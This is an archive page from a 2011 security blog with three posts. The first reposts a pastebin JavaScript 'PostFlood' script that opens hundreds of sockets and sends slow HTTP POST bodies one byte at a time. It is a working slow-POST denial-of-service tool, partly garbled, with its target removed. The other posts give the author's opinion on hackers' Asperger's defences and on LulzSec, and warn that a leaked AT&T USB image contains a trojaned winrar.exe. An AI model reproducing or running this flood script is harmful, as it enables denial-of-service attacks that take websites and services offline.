(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Archive for June 27th, 2011

Tell Me if You’ve Seen This One Before…

leave a comment »

As found on pastebin minutes ago…

  1. include(“framework/mootools.js”);
  2. var PostFlood = function(url) {
  3.         this.url = url;
  4.         this.sockets = [];
  5.         let result  = this.url.match(“^.*?://(.*?)(:([0-9]+))?((/.*)|)$”);
  6.   = result[1];
  7.         this.port   = result[3] || 80;
  8.         this.query  = result[4];
  9. }
  10. PostFlood.prototype.start = function(n, duration) {
  11.         for (let i = 0; i < n; i++) {
  12.                 Ape.setTimeout(function(z) {
  13.                         let socket = new Ape.sockClient(80,, { flushlf: false });
  14.                         socket.n = z;
  15.                         socket.t = 0;
  16.                         socket.onConnect = function() {
  17.                                 let x = 0;
  18.                                 //socket.write = Ape.log;
  19.                                 Ape.log(‘connected (‘+z+’)’);
  20.                                 socket.write(‘POST ‘+this.query+’ HTTP/1.0\n’);
  21.                                 socket.write(‘Host: ‘’\n’);
  22.                                 socket.write(‘User-Agent: Mozilla/4.0\n’);
  23.                                 socket.write(‘Content-length: ‘+duration+’\n\n’);
  24.                                 let timer = Ape.setInterval(function() {
  25.                                         if (x++ == duration) {
  26.                                                 Ape.clearInterval(timer);
  27.                                                 return;
  28.                                         }
  29.                                         socket.t++;
  30.                                         socket.write(‘a’);
  31.                                 }, $random(900, 1100));
  32.                         }.bind(this)
  33.                         socket.onRead = function(data) {
  34.                                 //Ape.log(data);
  35.                         }
  36.                         socket.onDisconnect = function() {
  37.                                 Ape.log(‘Disconnected’);
  38.                         }
  39.                 }.bind(this), $random(20, 30)*i, i);
  40.         }
  41. }
  42. Ape.addEvent(‘init’, function() {
  43.         Ape.log(‘start’);
  44.         var flood = new PostFlood(‘;);
  45.         flood.start(800, 600);
  46. });

Written by Krypt3ia

2011/06/27 at 23:15

Posted in c0de, D0S, jihad

Asperger’s: The New Insanity Defense for Hacking?

with 4 comments

Asperger syndrome or Asperger’s syndrome or Asperger disorder (play /ˈɑspərɡərz/[1] or /ˈæspərɡərz/[2]) is an autism spectrum disorder that is characterized by significant difficulties in social interaction, along with restricted and repetitive patterns of behavior and interests. It differs from other autism spectrum disorders by its relative preservation of linguistic and cognitive development. Although not required for diagnosis, physical clumsiness and atypical use of language are frequently reported.[3][4]

From Wikipedia

Since the Gary McKinnon case, the use of the diagnosis by a defence team of “Asperger’s” seems to have become a go to position, at least that is presently in the U.K. justice system. The recent arrest of Ryan Cleary for cracking and DD0S attacks on sites such as SOCA also seems to be showing a penchant in the UK legal system toward launching a kind of an “Insanity Defence” by proxy of a declaration that Ryan is a high functioning autistic (Asperger’s) and that because of it, he may have not been able to stop himself.

While this theory may be in fact be the case in with both of these defendants on some level, the LEGAL aspect of this is this;

“Did they know they were committing crimes? Furthermore, can it be proven without a doubt that they both suffered to the extent that the compulsive behaviour was inescapable?”

If the answer is definitively that they had no control, then they should be treated and perhaps NEVER allowed access to the Internet again. This might be the way to punish them as well as keep them out of the penal system (even the mental health facilities therein) as opposed to putting them into the general populace in prison. However, I do not feel that the diagnosis of Asperger’s can really allow for their innocence of the crimes that they are charged with. Both of these guys are functionally capable of interacting with others around them and certainly capable of holding technical knowledge and acting upon it for their own ends.

The one point that the lawyers will make though is this notion that Asperger’s sufferers display obsessive behaviours concerning specific things that interest them. Some collect things, others memorise things. In the case of McKinnon and Cleary, they both obsessively hacked into things and stole data. In the Cleary case though, he was caught in the act of DD0s’ing a UK police site when they caught him. As far as I know, this is not necessarily a known Asperger’s syndrome effect or behaviour. (see below)

People with Asperger syndrome often display behavior, interests, and activities that are restricted and repetitive and are sometimes abnormally intense or focused. They may stick to inflexible routines, move in stereotyped and repetitive ways, or preoccupy themselves with parts of objects.[24]

Pursuit of specific and narrow areas of interest is one of the most striking features of AS.[3] Individuals with AS may collect volumes of detailed information on a relatively narrow topic such as weather data or star names, without necessarily having genuine understanding of the broader topic.[3][7] For example, a child might memorize camera model numbers while caring little about photography.[3] This behavior is usually apparent by grade school, typically age 5 or 6 in the United States.[3] Although these special interests may change from time to time, they typically become more unusual and narrowly focused, and often dominate social interaction so much that the entire family may become immersed. Because narrow topics often capture the interest of children, this symptom may go unrecognized.[7

From Wikipedia

So, basically we have the lawyers in the UK trying to say “You can’t put Rainman in jail!” My question is just how long will it be before the US legal system catches up to this defence tool too? Can you imagine the next cases in the US being tried and the legal team for the accused finding a shrink that will testify that the cracker could not help himself..

He has Asperger’s after all!

This does not fly with me and I don’t see the court system or juries buying into it either, but you know they will try. Presently, the cases in the UK are being spun up and in the case of McKinnon, he has been fighting extradition for quite some time for hacking NASA. All the while his people have in fact been fighting the case in the media playing up that he is mentally unstable in the hopes that pity will prevail. The very same thing seems to be shaping up already for the Cleary case with videos (him stoned off his ass from huffing glue or perhaps just 420’d) showing up online and the diagnosis making the front pages of many news outlets.

Sorry.. But I don’t buy it. Sure, you may be mentally ill Ryan, but, I still think you knew what you were doing and are high enough functioning to be put in the pokey for it. Which brings me to another statement that is sticking in my craw;

LulzSec disbands: Hacking group LulzSec announced it was disbanding Saturday, 50 days after its first publicised hack. A member of the group told The Associated Press that the group was “bored” and denied that it was stopping its public attacks because of pressure from law enforcement. The LulzSec member did, however, say that some of the chat logs and information about hackers’ identities was correct.

From The Washington Post

Bored? BORED? Really? How about you go out and get some exercise or maybe read a book? Bored, I know that this likely is just a ruse in this case as the Feds are investigating all those DOX put out on you all but really, bored. This does though make me ask why they are doing this, and just how do they all rationalise in their heads about the right and wrong of it.

Does Lulzsec have Asperger’s en toto? Or have we raised and are we will raising generations of sociopaths with computers I wonder? Looking at 4chan, one can see where the Lulz came from and frankly, while some of it is damn funny, other things there are a bit disturbing. The conventions of society seem to have been stripped in the digital world and it is anything goes… AND this is the crux of the issue isn’t it? After all, now the hacking and the cyber bullying etc have begun to manifest real life physical outcomes today because we have networked our lives so much.

The Lulz actions to date really did not amount to much in the sense of destroying lives as far as I know of. However, they have broken many laws and thought themselves to be outside of their dominion. I am pretty sure that some, if not all of them, are about to find out otherwise, but, it is a disturbing trend isn’t it? Because the internet is so new and the parents of these kids likely have had little interface with it, they have not even thought about trying to apply the norms of how they should act in the real world and society to the digital world.

That is the problem.

It’s time to give out the digital spankings.


Written by Krypt3ia

2011/06/27 at 18:19

LulzSec’s Pre-Pwn3d AT&T USB Image

with 4 comments

It seems that the Lulz just keep on coming from the LulzBoat, even if they have sailed into the sunset. Upon investigation the USB bootable file from AT&T has malware within it. The winrar.exe file that is on board is a trojan as you can see in the capture above. It now remains to be seen whether or not this file was pre-pwn3d (i.e. the file was already corrupted with malware when they stole it) or, that someone was being smart with us all from Lulzsec and seeing just how many fools would make an iso and run the bootable then install the handy winrar.exe pre packaged with it.

Either way, you kids out there who have downloaded the v1 of the torrent, be careful not to pwn yourselves as you play!

Have fun!


Written by Krypt3ia

2011/06/27 at 00:19

Posted in Lulz, LulzSec, Malware